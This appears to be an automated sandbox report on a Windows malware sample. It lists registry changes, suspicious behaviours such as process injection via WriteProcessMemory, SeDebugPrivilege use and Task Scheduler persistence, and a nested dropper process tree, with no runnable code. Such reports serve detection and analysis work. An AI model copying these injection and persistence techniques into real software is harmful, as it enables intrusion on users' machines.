Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1831 = "Russia TZ 2 Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1931 = "Russia TZ 11 Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2341 = "Haiti Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1862 = "Russia TZ 6 Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2591 = "Tocantins Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1971 = "Belarus Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1871 = "Russia TZ 7 Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3qu90Pt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3qu90Pt.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3qu90Pt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\A5C5.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\AAB9.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4368 wrote to memory of 4120 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\VH4vX77.exe
PID 4368 wrote to memory of 4120 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\VH4vX77.exe
PID 4368 wrote to memory of 4120 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\VH4vX77.exe
PID 4120 wrote to memory of 2196 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\VH4vX77.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exe
PID 4120 wrote to memory of 2196 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\VH4vX77.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exe
PID 4120 wrote to memory of 2196 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\VH4vX77.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exe
PID 2196 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe
PID 2196 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe
PID 2196 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe
PID 2744 wrote to memory of 3408 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exe
PID 2744 wrote to memory of 3408 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exe
PID 2744 wrote to memory of 3408 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exe
PID 3408 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe
PID 3408 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe
PID 3408 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe
PID 3408 wrote to memory of 3304 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Pm6119.exe
PID 3408 wrote to memory of 3304 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Pm6119.exe
PID 3408 wrote to memory of 3304 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Pm6119.exe
PID 2744 wrote to memory of 4472 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3qu90Pt.exe
PID 2744 wrote to memory of 4472 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3qu90Pt.exe
PID 2744 wrote to memory of 4472 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3qu90Pt.exe
PID 2196 wrote to memory of 5036 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4HS096BX.exe
PID 2196 wrote to memory of 5036 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4HS096BX.exe
PID 2196 wrote to memory of 5036 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4HS096BX.exe
PID 3208 wrote to memory of 1916 N/A N/A C:\Users\Admin\AppData\Local\Temp\9F58.exe
PID 3208 wrote to memory of 1916 N/A N/A C:\Users\Admin\AppData\Local\Temp\9F58.exe
PID 3208 wrote to memory of 1916 N/A N/A C:\Users\Admin\AppData\Local\Temp\9F58.exe
PID 1916 wrote to memory of 4124 N/A C:\Users\Admin\AppData\Local\Temp\9F58.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\AH0ga1vM.exe
PID 1916 wrote to memory of 4124 N/A C:\Users\Admin\AppData\Local\Temp\9F58.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\AH0ga1vM.exe
PID 1916 wrote to memory of 4124 N/A C:\Users\Admin\AppData\Local\Temp\9F58.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\AH0ga1vM.exe
PID 3208 wrote to memory of 1664 N/A N/A C:\Users\Admin\AppData\Local\Temp\A0FF.exe
PID 3208 wrote to memory of 1664 N/A N/A C:\Users\Admin\AppData\Local\Temp\A0FF.exe
PID 3208 wrote to memory of 1664 N/A N/A C:\Users\Admin\AppData\Local\Temp\A0FF.exe
PID 3208 wrote to memory of 1088 N/A N/A C:\Windows\system32\cmd.exe
PID 3208 wrote to memory of 1088 N/A N/A C:\Windows\system32\cmd.exe
PID 4124 wrote to memory of 3904 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\AH0ga1vM.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\qS9tw1uX.exe
PID 4124 wrote to memory of 3904 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\AH0ga1vM.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\qS9tw1uX.exe
PID 4124 wrote to memory of 3904 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\AH0ga1vM.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\qS9tw1uX.exe
PID 3904 wrote to memory of 632 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\qS9tw1uX.exe C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\sC2xv8pP.exe
PID 3904 wrote to memory of 632 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\qS9tw1uX.exe C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\sC2xv8pP.exe
PID 3904 wrote to memory of 632 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\qS9tw1uX.exe C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\sC2xv8pP.exe
PID 3208 wrote to memory of 3696 N/A N/A C:\Users\Admin\AppData\Local\Temp\A46C.exe
PID 3208 wrote to memory of 3696 N/A N/A C:\Users\Admin\AppData\Local\Temp\A46C.exe
PID 3208 wrote to memory of 3696 N/A N/A C:\Users\Admin\AppData\Local\Temp\A46C.exe
PID 3208 wrote to memory of 4972 N/A N/A C:\Users\Admin\AppData\Local\Temp\A5C5.exe
PID 3208 wrote to memory of 4972 N/A N/A C:\Users\Admin\AppData\Local\Temp\A5C5.exe
PID 3208 wrote to memory of 4972 N/A N/A C:\Users\Admin\AppData\Local\Temp\A5C5.exe
PID 632 wrote to memory of 4800 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\sC2xv8pP.exe C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\hd8Im5XM.exe
PID 632 wrote to memory of 4800 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\sC2xv8pP.exe C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\hd8Im5XM.exe
PID 632 wrote to memory of 4800 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\sC2xv8pP.exe C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\hd8Im5XM.exe
PID 4800 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\hd8Im5XM.exe C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\1AP90VT0.exe
PID 4800 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\hd8Im5XM.exe C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\1AP90VT0.exe
PID 4800 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\hd8Im5XM.exe C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\1AP90VT0.exe
PID 3208 wrote to memory of 2596 N/A N/A C:\Users\Admin\AppData\Local\Temp\A6FE.exe
PID 3208 wrote to memory of 2596 N/A N/A C:\Users\Admin\AppData\Local\Temp\A6FE.exe
PID 3208 wrote to memory of 2596 N/A N/A C:\Users\Admin\AppData\Local\Temp\A6FE.exe
PID 1088 wrote to memory of 388 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1088 wrote to memory of 388 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3208 wrote to memory of 2148 N/A N/A C:\Users\Admin\AppData\Local\Temp\A98F.exe
PID 3208 wrote to memory of 2148 N/A N/A C:\Users\Admin\AppData\Local\Temp\A98F.exe
PID 3208 wrote to memory of 2148 N/A N/A C:\Users\Admin\AppData\Local\Temp\A98F.exe
PID 4800 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\hd8Im5XM.exe C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\2ki127Ll.exe
PID 4800 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\hd8Im5XM.exe C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\2ki127Ll.exe
PID 4800 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\hd8Im5XM.exe C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\2ki127Ll.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\file.exe

"C:\Users\Admin\AppData\Local\Temp\file.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\VH4vX77.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\VH4vX77.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Pm6119.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Pm6119.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3qu90Pt.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3qu90Pt.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4HS096BX.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4HS096BX.exe

C:\Users\Admin\AppData\Local\Temp\9F58.exe

C:\Users\Admin\AppData\Local\Temp\9F58.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\AH0ga1vM.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\AH0ga1vM.exe

C:\Users\Admin\AppData\Local\Temp\A0FF.exe

C:\Users\Admin\AppData\Local\Temp\A0FF.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\A238.bat" "

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\qS9tw1uX.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\qS9tw1uX.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\sC2xv8pP.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\sC2xv8pP.exe

C:\Users\Admin\AppData\Local\Temp\A46C.exe

C:\Users\Admin\AppData\Local\Temp\A46C.exe

